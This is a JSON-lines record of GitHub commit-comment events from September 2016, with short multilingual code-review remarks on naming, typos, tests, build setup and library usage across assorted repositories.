{"id":"4628818040","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19202960,"position":5,"line":5,"path":"src/pl/pikselke/mchw/enums/McHwEnum.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T06:51:41Z","updated_at":"2016-09-28T06:51:41Z","body":"znowu, `PRACE`????"}},"created_at":"2016-09-28T06:51:41Z"}
{"id":"4628818962","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19202961,"position":16,"line":16,"path":"src/pl/pikselke/mchw/enums/McHwEnum.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T06:51:55Z","updated_at":"2016-09-28T06:51:55Z","body":"`SerwerMode` xDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD\r\n`ServerMode`*"}},"created_at":"2016-09-28T06:51:55Z"}
{"id":"4628819580","type":"CommitCommentEvent","actor":{"login":"ahsanch"},"repo":{"name":"liris/tweepy"},"payload":{"comment":{"id":19202963,"position":null,"line":null,"path":null,"commit_id":"831ec87dd476cc177f13a7cb37484e16086d8786","created_at":"2016-09-28T06:52:08Z","updated_at":"2016-09-28T06:52:08Z","body":"Here, i have proxy_server 172.16.24.2 and proxy_port 3128. Do I have to make the changes as:\r\nproxy_host=172.16.24.2\r\nproxy_port=3128\r\nOR\r\nproxy_host='172.16.24.2'\r\nproxy_port=3128\r\n?"}},"created_at":"2016-09-28T06:52:08Z"}
{"id":"4628820188","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19202965,"position":18,"line":18,"path":"src/pl/pikselke/mchw/listeners/PlayerInteractWorkBeanch.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T06:52:18Z","updated_at":"2016-09-28T06:52:18Z","body":"Słaba klasa te `CraftingInventory1`, nie tak się to nazywa ;_;"}},"created_at":"2016-09-28T06:52:18Z"}
{"id":"4628820620","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19202967,"position":11,"line":11,"path":"src/pl/pikselke/mchw/listeners/PlayerJoinQuit.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T06:52:26Z","updated_at":"2016-09-28T06:52:26Z","body":"._."}},"created_at":"2016-09-28T06:52:26Z"}
{"id":"4628821815","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19202971,"position":6,"line":6,"path":"src/pl/pikselke/mchw/utils/RegisterGunsItemStack.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T06:52:47Z","updated_at":"2016-09-28T06:52:47Z","body":"Po chuj ta klasa?"}},"created_at":"2016-09-28T06:52:47Z"}
{"id":"4628822383","type":"CommitCommentEvent","actor":{"login":"j003918"},"repo":{"name":"j003918/j003918.github.io"},"payload":{"comment":{"id":19202976,"position":20,"line":20,"path":"index.html","commit_id":"4c45c70499b0bff3206315cd6fc4130a2c483487","created_at":"2016-09-28T06:52:58Z","updated_at":"2016-09-28T06:52:58Z","body":"<h3>i am jhf</h3>"}},"created_at":"2016-09-28T06:52:58Z"}
{"id":"4628823792","type":"CommitCommentEvent","actor":{"login":"dikys"},"repo":{"name":"dikys/C-courses"},"payload":{"comment":{"id":19202977,"position":110,"line":85,"path":"Task1/TriangleTest.cs","commit_id":"b12cfa6a4358e55d1cf6f1e4cae268f63cb904a9","created_at":"2016-09-28T06:53:21Z","updated_at":"2016-09-28T06:53:21Z","body":"\nЗначит использовать 5 технику! И мне 1 отказаться! Хорошо! Я вот про эти техники  https://dzone.com/articles/7-popular-unit-test-naming  .\n\nА как например назвать тест. Тест на метод вычисления площади треугольника. Тест проверяет правильность вычисления.\nВот я придумал какой-то треугольник, вычислил для него площадь ручками.\nИ как мне в названии тесто отразить?\nТак?  should equal square my triangle when my triangle initialized  Хотя это не красиво, я просто не знаю как называть позитивные тесты, которые, например проверяют правильно ли считает алгоритм на определенных данных, которые я придумал.\n\nДруг приводил примеры например для конструктора треугольника по 3 сторона. \nДолжен быть равнобедренный треугольник когда две стороны равны\n\nА вот как назвать тест для какого-нибудь алгоритма посложнее, например вычисление вычисление интеграла численным методом. И мы хотим проверить, что на тестовом примере для которого мы заранее руками все расписали, результат метода должен совпадать с нашими численными подсчетами.\n\n>Среда, 28 сентября 2016, 10:55 +05:00 от Alexander Kozko <notifications@github.com>:\n>\n>ShouldThrowArgumentExceptionWhenCreateWithSideOrAngleLessOrEqualZero\n>—\n>You are receiving this because you are subscribed to this thread.\n>Reply to this email directly,  view it on GitHub , or  mute the thread .\n\n"}},"created_at":"2016-09-28T06:53:21Z"}
{"id":"4628825414","type":"CommitCommentEvent","actor":{"login":"josegonzalez"},"repo":{"name":"TakumiBaba/dokku"},"payload":{"comment":{"id":19202982,"position":4,"line":7,"path":"debian/control","commit_id":"879005b414f7d8c349a6b23940670f0bc9c1cf1e","created_at":"2016-09-28T06:53:49Z","updated_at":"2016-09-28T06:53:49Z","body":"Why did you make this change? You can instead just install the package using:\r\n\r\n```shell\r\napt-get --no-install-recommends install dokku\r\n```\r\n\r\nTo avoid installing herokuish."}},"created_at":"2016-09-28T06:53:49Z"}
{"id":"4628827130","type":"CommitCommentEvent","actor":{"login":"chrisli323"},"repo":{"name":"chrisli323/Hello-World-2"},"payload":{"comment":{"id":19202987,"position":4,"line":4,"path":"README.md","commit_id":"a6f9624eeef59b5b06369d4b003461cb9d0fd590","created_at":"2016-09-28T06:54:19Z","updated_at":"2016-09-28T06:54:19Z","body":"Forgot the period."}},"created_at":"2016-09-28T06:54:19Z"}
{"id":"4628827962","type":"CommitCommentEvent","actor":{"login":"wakaleo"},"repo":{"name":"serenity-dojo/screenplay-miniprojects"},"payload":{"comment":{"id":19202988,"position":21,"line":37,"path":"src/test/java/serenitylabs/tutorials/trains/WhenPlanningATrip.java","commit_id":"8164e54f5a7cde488cb9c25ff20ab4e4996ca471","created_at":"2016-09-28T06:54:33Z","updated_at":"2016-09-28T06:54:33Z","body":"This would mean that Bill and Tracy share the browser. You can give them separate browsers by using two different @Managed WebDriver fields."}},"created_at":"2016-09-28T06:54:33Z"}
{"id":"4628829203","type":"CommitCommentEvent","actor":{"login":"chrisli323"},"repo":{"name":"chrisli323/Hello-World-2"},"payload":{"comment":{"id":19202989,"position":null,"line":null,"path":null,"commit_id":"a6f9624eeef59b5b06369d4b003461cb9d0fd590","created_at":"2016-09-28T06:54:55Z","updated_at":"2016-09-28T06:54:55Z","body":"Made grammar note."}},"created_at":"2016-09-28T06:54:55Z"}
{"id":"4628833817","type":"CommitCommentEvent","actor":{"login":"ackd06"},"repo":{"name":"ackd06/s1022756"},"payload":{"comment":{"id":19202992,"position":null,"line":null,"path":null,"commit_id":"c08b23013a110bacfdb0067b99998991753b3f11","created_at":"2016-09-28T06:56:14Z","updated_at":"2016-09-28T06:56:14Z","body":"yuyu"}},"created_at":"2016-09-28T06:56:14Z"}
{"id":"4628834459","type":"CommitCommentEvent","actor":{"login":"mihkels"},"repo":{"name":"open-eid/SiVa"},"payload":{"comment":{"id":19202993,"position":36,"line":61,"path":"validation-services-parent/validation-commons/src/main/java/ee/openeid/siva/validation/util/CertUtil.java","commit_id":"5f5e0aa5829a3d2d6b380fbcd31beac2903fd6a9","created_at":"2016-09-28T06:56:26Z","updated_at":"2016-09-28T06:56:26Z","body":"Maybe rename to `getASN1ValueByIdentifier()`"}},"created_at":"2016-09-28T06:56:26Z"}
{"id":"4628835041","type":"CommitCommentEvent","actor":{"login":"jerryleeinking"},"repo":{"name":"jerryleeinking/min"},"payload":{"comment":{"id":19202994,"position":null,"line":null,"path":null,"commit_id":"376dc27220aea730ffa90bffef2ee59d3c696436","created_at":"2016-09-28T06:56:35Z","updated_at":"2016-09-28T06:56:35Z","body":"hi"}},"created_at":"2016-09-28T06:56:35Z"}
{"id":"4628836697","type":"CommitCommentEvent","actor":{"login":"dikys"},"repo":{"name":"dikys/C-courses"},"payload":{"comment":{"id":19202999,"position":118,"line":94,"path":"Task1/Triangle.cs","commit_id":"b12cfa6a4358e55d1cf6f1e4cae268f63cb904a9","created_at":"2016-09-28T06:57:05Z","updated_at":"2016-09-28T06:57:05Z","body":"Как называть))) Может есть крутая статья?\n\n\n>Среда, 28 сентября 2016, 11:19 +05:00 от Alan delon <lrdikysa@mail.ru>:\n>\n>Ага, я знаю. А что делать?))) Ко мне один преподаватель приставал, что не понятно, что и как делает метод. Отсюда названия такие\n>\n>\n>>Среда, 28 сентября 2016, 10:52 +05:00 от Alexander Kozko < notifications@github.com >:\n>>\n>>ОООООООООООООООЧЧЧЧЧЧЧЧЕЕЕЕЕЕНННННЬЬЬЬЬЬЬ длинное название метода\n>>—\n>>You are receiving this because you are subscribed to this thread.\n>>Reply to this email directly,  view it on GitHub , or  mute the thread .\n>\n\n"}},"created_at":"2016-09-28T06:57:05Z"}
{"id":"4628849940","type":"CommitCommentEvent","actor":{"login":"vinay13"},"repo":{"name":"django/django"},"payload":{"comment":{"id":19203022,"position":7,"line":1185,"path":"docs/releases/1.8.txt","commit_id":"81b55fb90078788bfdc064550f2ff9da2c79d3b6","created_at":"2016-09-28T07:00:38Z","updated_at":"2016-09-28T07:00:38Z","body":"Typo in line 1185 . It should be 'manage.py' not 'migrate.py'"}},"created_at":"2016-09-28T07:00:38Z"}
{"id":"4628864506","type":"CommitCommentEvent","actor":{"login":"AlexGalays"},"repo":{"name":"AlexGalays/loop"},"payload":{"comment":{"id":19203074,"position":null,"line":null,"path":null,"commit_id":"40fbcbeee46f7c1cc7a46be716cdc460cd78fc89","created_at":"2016-09-28T07:04:46Z","updated_at":"2016-09-28T07:04:46Z","body":"Locally (where the devloop.js script is) It can load either local or npm modules. "}},"created_at":"2016-09-28T07:04:46Z"}
{"id":"4628865394","type":"CommitCommentEvent","actor":{"login":"JSpiner"},"repo":{"name":"JSpiner/gtx1080_tensorflow"},"payload":{"comment":{"id":19203075,"position":null,"line":null,"path":null,"commit_id":"e846ab1983f9e69726b6e499e2e051dbec45b386","created_at":"2016-09-28T07:05:01Z","updated_at":"2016-09-28T07:05:01Z","body":"환경변수 설정입니다."}},"created_at":"2016-09-28T07:05:01Z"}
{"id":"4628865796","type":"CommitCommentEvent","actor":{"login":"rrrene"},"repo":{"name":"rrrene/inch_ex"},"payload":{"comment":{"id":19203076,"position":27,"line":40,"path":"lib/inch_ex/reporter/remote.ex","commit_id":"81684ed22a404adea13e85105e2b3c5a4af3e463","created_at":"2016-09-28T07:05:08Z","updated_at":"2016-09-28T07:05:08Z","body":"Exactly. Inch CI does not have a \"pull request flag\" for the reportings it persists. We basically just have projects and branches. Therefore we have to skip all evaluations which can savely be identified as \"CI runs for pull requests\"."}},"created_at":"2016-09-28T07:05:08Z"}
{"id":"4628872848","type":"CommitCommentEvent","actor":{"login":"m-kuhn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19203093,"position":null,"line":null,"path":null,"commit_id":"89d4998510bccbf7817671171c25cf71deab6f9a","created_at":"2016-09-28T07:07:03Z","updated_at":"2016-09-28T07:07:03Z","body":"FYI, the test was disabled because it seemed to produce unreliable results: https://github.com/qgis/QGIS/commit/6214dc11e25a1fa67d2d9cb8ba6068e8ef4617f9\r\n\r\nIf that's fixed, that's good news :)"}},"created_at":"2016-09-28T07:07:03Z"}
{"id":"4628877764","type":"CommitCommentEvent","actor":{"login":"Chklang"},"repo":{"name":"Chklang/pokemonGoDB"},"payload":{"comment":{"id":19203106,"position":null,"line":null,"path":null,"commit_id":"4c83e511f0e79ea76c9c8f5d6cb90280432d28ab","created_at":"2016-09-28T07:08:31Z","updated_at":"2016-09-28T07:08:31Z","body":"Correction, not pokemon 86, pokemon 88"}},"created_at":"2016-09-28T07:08:31Z"}
{"id":"4628881145","type":"CommitCommentEvent","actor":{"login":"gziolo"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19203110,"position":8,"line":16,"path":"client/plugins/hello-world/hello-world.js","commit_id":"df8a938e7a14c44c46894f9757f921bb6f888f86","created_at":"2016-09-28T07:09:32Z","updated_at":"2016-09-28T07:09:32Z","body":"Now question is how we should handle more advanced CSS styles :)\r\n\r\nThere a couple of options:\r\n* keep it inline like in this file\r\n* teach our [SCSS file](https://github.com/Automattic/wp-calypso/blob/master/assets/stylesheets/style.scss) to load style files from plugins dynamically\r\n* teach WebPack to load styles from import statements like ```import styles from './style.scss';```"}},"created_at":"2016-09-28T07:09:32Z"}
{"id":"4628883946","type":"CommitCommentEvent","actor":{"login":"Bulls2016"},"repo":{"name":"Bulls2016/BullsAssignment3"},"payload":{"comment":{"id":19203117,"position":null,"line":null,"path":null,"commit_id":"08c894aa9eeef57163068be9fb27809cdffd4798","created_at":"2016-09-28T07:10:19Z","updated_at":"2016-09-28T07:10:19Z","body":"testing"}},"created_at":"2016-09-28T07:10:19Z"}
{"id":"4628885983","type":"CommitCommentEvent","actor":{"login":"gonetz"},"repo":{"name":"gonetz/GLideN64"},"payload":{"comment":{"id":19203120,"position":null,"line":null,"path":null,"commit_id":"d5412d30e1c909956ef2a1bd24bda27ab71fc6e5","created_at":"2016-09-28T07:10:54Z","updated_at":"2016-09-28T07:10:54Z","body":"Add support for software depth render in DKR and JFG."}},"created_at":"2016-09-28T07:10:54Z"}
{"id":"4628886804","type":"CommitCommentEvent","actor":{"login":"ChaosPKU"},"repo":{"name":"ChaosPKU/exercise"},"payload":{"comment":{"id":19203121,"position":null,"line":null,"path":null,"commit_id":"cc56fee5eef62bc6f156ad78447299ec6bea1558","created_at":"2016-09-28T07:11:07Z","updated_at":"2016-09-28T07:11:07Z","body":"backtracking & stl map"}},"created_at":"2016-09-28T07:11:07Z"}
{"id":"4628887551","type":"CommitCommentEvent","actor":{"login":"iamstarkov"},"repo":{"name":"nordnet/nordnet-next-api"},"payload":{"comment":{"id":19203126,"position":null,"line":null,"path":null,"commit_id":"5d62c1b37d2acb74be49a47518dbfd28526d43cb","created_at":"2016-09-28T07:11:19Z","updated_at":"2016-09-28T07:11:19Z","body":"Because cached version is being merged with default headers only once at the start, so setConfig doesn't have any effect on post/put requests"}},"created_at":"2016-09-28T07:11:19Z"}
{"id":"4628888413","type":"CommitCommentEvent","actor":{"login":"Ritiek"},"repo":{"name":"Ritiek/Spotify-Downloader"},"payload":{"comment":{"id":19203129,"position":null,"line":null,"path":null,"commit_id":"1ed466115b84bed58353a32fd869ee78fd33e81b","created_at":"2016-09-28T07:11:32Z","updated_at":"2016-09-28T07:11:32Z","body":"hehe, its okay :D"}},"created_at":"2016-09-28T07:11:32Z"}
{"id":"4628889156","type":"CommitCommentEvent","actor":{"login":"tiny-wenwen"},"repo":{"name":"tiny-wenwen/course"},"payload":{"comment":{"id":19203130,"position":null,"line":null,"path":null,"commit_id":"ae9eb199eef116a73f58515516b3a30386b94de8","created_at":"2016-09-28T07:11:44Z","updated_at":"2016-09-28T07:11:44Z","body":"# course\r\n百度前端技术学院任务总汇\r\nhttps://tiny-wenwen.github.io/course/index.html"}},"created_at":"2016-09-28T07:11:44Z"}
{"id":"4628891841","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"nastylia/railway"},"payload":{"comment":{"id":19203137,"position":2,"line":2,"path":"railway/app/models/route.rb","commit_id":"f3f92ae40737b4ad592b28c961025a37870b0392","created_at":"2016-09-28T07:12:29Z","updated_at":"2016-09-28T07:12:29Z","body":"В моделях принято сначала писать валидации, потом ассоциации."}},"created_at":"2016-09-28T07:12:29Z"}
{"id":"4628896450","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"nastylia/railway"},"payload":{"comment":{"id":19203148,"position":1,"line":1,"path":"railway/app/controllers/tickets_controller.rb","commit_id":"bc05bfe40f03bc6c3bc2c0ad28a9f3eb7ed009d0","created_at":"2016-09-28T07:13:45Z","updated_at":"2016-09-28T07:13:45Z","body":"В задании ничего не сказано было о том, что нужны контроллеры. Нужны были только модели и связи."}},"created_at":"2016-09-28T07:13:45Z"}
{"id":"4628901841","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"nastylia/railway"},"payload":{"comment":{"id":19203158,"position":5,"line":7,"path":"railway/app/models/railway_station.rb","commit_id":"80c5b9331e52fdf453363c8b4d5887237e3b5bf0","created_at":"2016-09-28T07:15:20Z","updated_at":"2016-09-28T07:15:20Z","body":"Нельзя одинаково называть ассоциации, последняя переопределит первую. Ну и подумай: если у нас 2 одинаковые ассоциации и мы где-то вызываем `railway_station.tickets`, то какую из 2-х мы имеем в виду?"}},"created_at":"2016-09-28T07:15:20Z"}
{"id":"4628902820","type":"CommitCommentEvent","actor":{"login":"dergraaf"},"repo":{"name":"dergraaf/xpcc"},"payload":{"comment":{"id":19203165,"position":5,"line":9,"path":"src/xpcc/architecture/platform/driver/uart/stm32/uart.cpp.in","commit_id":"b420ea76bd6d6729ff7948c39cdef38840b8f323","created_at":"2016-09-28T07:15:35Z","updated_at":"2016-09-28T07:15:35Z","body":"Hmm, to much copy-paste and to many different versions of the same pattern."}},"created_at":"2016-09-28T07:15:35Z"}
{"id":"4628905744","type":"CommitCommentEvent","actor":{"login":"sebastian-nagel"},"repo":{"name":"sebastian-nagel/storm-crawler"},"payload":{"comment":{"id":19203170,"position":58,"line":58,"path":"external/elasticsearch/src/main/java/com/digitalpebble/stormcrawler/elasticsearch/persistence/AbstractElasticSearchSpout.java","commit_id":"654569d2b817f958d6fc1395c8e983d5ed7396df","created_at":"2016-09-28T07:16:22Z","updated_at":"2016-09-28T07:16:22Z","body":"While AggregationSpout uses a set, ElasticSearchSpout stores hosts/domains/ips as map values.  To cover both classes/usages, a map with null or optional values is compromise. But yes, to have a set available is clearer."}},"created_at":"2016-09-28T07:16:22Z"}
{"id":"4628918813","type":"CommitCommentEvent","actor":{"login":"amura2406"},"repo":{"name":"amura2406/babe_user_disregard_ms"},"payload":{"comment":{"id":19203186,"position":null,"line":null,"path":null,"commit_id":"3e7c4df2fd4f545e2d2e47fcd29080ebe42abb63","created_at":"2016-09-28T07:19:33Z","updated_at":"2016-09-28T07:19:33Z","body":"__API Description file syntax error on line 124__: base type 'mumber' is not defined in the document (Autogenerated message from apiary.io)"}},"created_at":"2016-09-28T07:19:33Z"}
{"id":"4628919505","type":"CommitCommentEvent","actor":{"login":"FernetMenta"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":19203188,"position":76,"line":118,"path":"project/cmake/modules/FindLibDvd.cmake","commit_id":"45c684c5f30676032b5d5f08a46fee0ced905812","created_at":"2016-09-28T07:19:43Z","updated_at":"2016-09-28T07:19:43Z","body":"@fetzerch @wsnipex the shared lib need to link with dvdread"}},"created_at":"2016-09-28T07:19:43Z"}
{"id":"4628924044","type":"CommitCommentEvent","actor":{"login":"dergraaf"},"repo":{"name":"dergraaf/xpcc"},"payload":{"comment":{"id":19203206,"position":14,"line":22,"path":"src/xpcc/architecture/platform/driver/uart/stm32/uart.cpp.in","commit_id":"b420ea76bd6d6729ff7948c39cdef38840b8f323","created_at":"2016-09-28T07:20:54Z","updated_at":"2016-09-28T07:20:54Z","body":"I also don't like the format at the moment. The goal is to avoid preprocessing in the `driver.lb` as much as possible. I am thinking about a multi value/array option. But I'm not sure about the API yet. In the template it would yield something like `options[\"::buffered][id]`."}},"created_at":"2016-09-28T07:20:54Z"}
{"id":"4628924586","type":"CommitCommentEvent","actor":{"login":"amura2406"},"repo":{"name":"amura2406/babe_user_disregard_ms"},"payload":{"comment":{"id":19203207,"position":null,"line":null,"path":null,"commit_id":"d06c2c4276d208fad87fa9dcc872b31bcc2c9121","created_at":"2016-09-28T07:21:03Z","updated_at":"2016-09-28T07:21:03Z","body":"__API Description file syntax error on line 124__: base type 'mumber' is not defined in the document (Autogenerated message from apiary.io)"}},"created_at":"2016-09-28T07:21:03Z"}
{"id":"4628924704","type":"CommitCommentEvent","actor":{"login":"sebastian-nagel"},"repo":{"name":"sebastian-nagel/storm-crawler"},"payload":{"comment":{"id":19203208,"position":68,"line":68,"path":"external/elasticsearch/src/main/java/com/digitalpebble/stormcrawler/elasticsearch/persistence/AbstractElasticSearchSpout.java","commit_id":"654569d2b817f958d6fc1395c8e983d5ed7396df","created_at":"2016-09-28T07:21:05Z","updated_at":"2016-09-28T07:21:05Z","body":"Ok."}},"created_at":"2016-09-28T07:21:05Z"}
{"id":"4628927306","type":"CommitCommentEvent","actor":{"login":"elitak"},"repo":{"name":"dezgeg/nixpkgs"},"payload":{"comment":{"id":19203213,"position":null,"line":null,"path":null,"commit_id":"30a8a494ddfd489bbaba9f24e2040e096a47bd1f","created_at":"2016-09-28T07:21:44Z","updated_at":"2016-09-28T07:21:44Z","body":"No, these still segfault. Are these being cross-built by x86_64? in `stdenv/linux/make-bootstrap-tools-cross.nix` ? I will have a look and see if I can fix it.\r\n\r\nThe ones at http://nixos-arm.dezgeg.me/bootstrap/armv5tel/ work."}},"created_at":"2016-09-28T07:21:44Z"}
{"id":"4628931835","type":"CommitCommentEvent","actor":{"login":"MoonCall"},"repo":{"name":"POSTECH-OOP-14/POSMON"},"payload":{"comment":{"id":19203220,"position":null,"line":null,"path":null,"commit_id":"01636a20a161c7ad1cd21623adb1d855fd655908","created_at":"2016-09-28T07:22:59Z","updated_at":"2016-09-28T07:22:59Z","body":"문법 극혐;"}},"created_at":"2016-09-28T07:22:59Z"}
{"id":"4628935069","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19203231,"position":null,"line":null,"path":null,"commit_id":"f73dac30cdbc7da7cc6db1ec2be422e61c57c42e","created_at":"2016-09-28T07:23:50Z","updated_at":"2016-09-28T07:23:50Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 272](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1246&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-28T07:23:50Z"}
{"id":"4628935651","type":"CommitCommentEvent","actor":{"login":"sebastian-nagel"},"repo":{"name":"sebastian-nagel/storm-crawler"},"payload":{"comment":{"id":19203233,"position":103,"line":103,"path":"external/elasticsearch/src/main/java/com/digitalpebble/stormcrawler/elasticsearch/persistence/AbstractElasticSearchSpout.java","commit_id":"654569d2b817f958d6fc1395c8e983d5ed7396df","created_at":"2016-09-28T07:24:00Z","updated_at":"2016-09-28T07:24:00Z","body":"no cons. But I'm not sure whether this prepare in the abstract class really was called. I got a NPE and after this fixed it by initializing `beingProcessed` as simple HashMap and also added a initialization in AggregationSpout.open(...)"}},"created_at":"2016-09-28T07:24:00Z"}
{"id":"4628936200","type":"CommitCommentEvent","actor":{"login":"sebastian-nagel"},"repo":{"name":"sebastian-nagel/storm-crawler"},"payload":{"comment":{"id":19203236,"position":65,"line":209,"path":"external/elasticsearch/src/main/java/com/digitalpebble/stormcrawler/elasticsearch/persistence/AggregationSpout.java","commit_id":"654569d2b817f958d6fc1395c8e983d5ed7396df","created_at":"2016-09-28T07:24:08Z","updated_at":"2016-09-28T07:24:08Z","body":"ok."}},"created_at":"2016-09-28T07:24:08Z"}
{"id":"4628937003","type":"CommitCommentEvent","actor":{"login":"sebastian-nagel"},"repo":{"name":"sebastian-nagel/storm-crawler"},"payload":{"comment":{"id":19203238,"position":72,"line":72,"path":"external/elasticsearch/src/main/java/com/digitalpebble/stormcrawler/elasticsearch/persistence/AbstractElasticSearchSpout.java","commit_id":"654569d2b817f958d6fc1395c8e983d5ed7396df","created_at":"2016-09-28T07:24:20Z","updated_at":"2016-09-28T07:24:20Z","body":"Just to be sure that nothing is overflowing?"}},"created_at":"2016-09-28T07:24:20Z"}
{"id":"4628938670","type":"CommitCommentEvent","actor":{"login":"soninob"},"repo":{"name":"eedevops/shipyard"},"payload":{"comment":{"id":19203243,"position":7,"line":73,"path":"docker-compose.yml","commit_id":"812cc24f4bea167e353307a66f342437f6adca11","created_at":"2016-09-28T07:24:47Z","updated_at":"2016-09-28T07:24:47Z","body":"@AndreeaDora -please change the hard coded path to your home directory "}},"created_at":"2016-09-28T07:24:47Z"}
{"id":"4628938901","type":"CommitCommentEvent","actor":{"login":"soninob"},"repo":{"name":"eedevops/shipyard"},"payload":{"comment":{"id":19203244,"position":28,"line":94,"path":"docker-compose.yml","commit_id":"812cc24f4bea167e353307a66f342437f6adca11","created_at":"2016-09-28T07:24:51Z","updated_at":"2016-09-28T07:24:51Z","body":"same here."}},"created_at":"2016-09-28T07:24:51Z"}
{"id":"4628944362","type":"CommitCommentEvent","actor":{"login":"bigomega"},"repo":{"name":"JedWatson/react-select"},"payload":{"comment":{"id":19203251,"position":65,"line":87,"path":"src/Async.js","commit_id":"b319024b20745e2cf788e7d08978376b493a08ac","created_at":"2016-09-28T07:26:15Z","updated_at":"2016-09-28T07:26:15Z","body":"The cache property is a boolean. This fails with\r\n```diff\r\n- Uncaught TypeError: Cannot create property 'ni' on boolean 'true'\r\n```\r\n\r\n> cache bool  true  enables the options cache for asyncOptions (default: true)\r\n\r\nhttps://github.com/JedWatson/react-select#further-options\r\n\r\n@bvaughn "}},"created_at":"2016-09-28T07:26:15Z"}
{"id":"4628950446","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"Minimata/WebGl"},"payload":{"comment":{"id":19203259,"position":73,"line":81,"path":"planet/js/scene.js","commit_id":"e07072c4298da68209d785ca8b83618293062f85","created_at":"2016-09-28T07:27:53Z","updated_at":"2016-09-28T07:27:53Z","body":"[`console.exception(e)`](https://developer.mozilla.org/en-US/Add-ons/SDK/Tools/console#console.exception(exception)) va aussi et un `finally` vide?"}},"created_at":"2016-09-28T07:27:53Z"}
{"id":"4628952356","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"Minimata/WebGl"},"payload":{"comment":{"id":19203261,"position":null,"line":null,"path":null,"commit_id":"e07072c4298da68209d785ca8b83618293062f85","created_at":"2016-09-28T07:28:25Z","updated_at":"2016-09-28T07:28:25Z","body":"> Little performance side tip, #v8 skips optimisation on functions that use 'let' - use 'var' instead. #nodejs #JavaScript - 'const' is fine.\r\n>\r\n> https://twitter.com/mikediarmid/status/780755208674635776"}},"created_at":"2016-09-28T07:28:25Z"}
{"id":"4628962918","type":"CommitCommentEvent","actor":{"login":"jfalcou"},"repo":{"name":"NumScale/boost.simd"},"payload":{"comment":{"id":19203277,"position":64,"line":64,"path":"include/boost/simd/arch/x86/avx/simd/function/deinterleave.hpp","commit_id":"b8458ae8a23ebc307b7e3ab5d2ac15d85968d16b","created_at":"2016-09-28T07:31:01Z","updated_at":"2016-09-28T07:31:01Z","body":"@alankelly \r\n\r\n> The second problem is why does boost.simd not recognise a __256 as a pack ?\r\n\r\n__m256 and other raw register types can't be hierarchized as pack because they lack all the constructor and operator[] that belonging to the pack hierarchy entails.\r\n\r\nThis piece of code is actually wrong, we should store the result of _mm_unpack in a proper pack then bitwise_cast'ed. Then ofc, as it's not hierarchized as pack, it goes through the generic common case hence the copy and the stack dance.\r\n\r\nSo we look at two issues :  \r\n - we need a common identity bitwise_cast\r\n - we need to be careful at not calling pack based function or raw register types."}},"created_at":"2016-09-28T07:31:01Z"}
{"id":"4628966735","type":"CommitCommentEvent","actor":{"login":"jedmccaleb"},"repo":{"name":"vogel/stellar-core"},"payload":{"comment":{"id":19203295,"position":null,"line":null,"path":null,"commit_id":"f3d8e0cb38469e6ddadfac0a221a4272a058df9b","created_at":"2016-09-28T07:32:07Z","updated_at":"2016-09-28T07:32:07Z","body":"r+"}},"created_at":"2016-09-28T07:32:07Z"}
{"id":"4628966897","type":"CommitCommentEvent","actor":{"login":"jfalcou"},"repo":{"name":"NumScale/boost.simd"},"payload":{"comment":{"id":19203296,"position":64,"line":64,"path":"include/boost/simd/arch/x86/avx/simd/function/deinterleave.hpp","commit_id":"b8458ae8a23ebc307b7e3ab5d2ac15d85968d16b","created_at":"2016-09-28T07:32:09Z","updated_at":"2016-09-28T07:32:09Z","body":"More precisely :  \r\n\r\n`A0 f = bitwise_cast<A0>( _mm256_unpacklo_ps( u0, u1 ) );`\r\n\r\nShould be\r\n\r\n`A0 f = bitwise_cast<A0>( as_floating_t<A0>(_mm256_unpacklo_ps( u0, u1 ))  );`\r\n\r\nand the `as_flaoting_t<A0>` type beign used like 5 ties could be put in a using."}},"created_at":"2016-09-28T07:32:09Z"}
{"id":"4628968774","type":"CommitCommentEvent","actor":{"login":"YoshiteruIwasaki"},"repo":{"name":"aipocom/aipo"},"payload":{"comment":{"id":19203302,"position":null,"line":null,"path":null,"commit_id":"0bc963ad3408e92db5b2a67a132d8721260b6c56","created_at":"2016-09-28T07:32:39Z","updated_at":"2016-09-28T07:32:39Z","body":"[![LGTM](https://lgtm.in/p/e30aVTtTp)](https://lgtm.in/i/e30aVTtTp)\r\n"}},"created_at":"2016-09-28T07:32:39Z"}
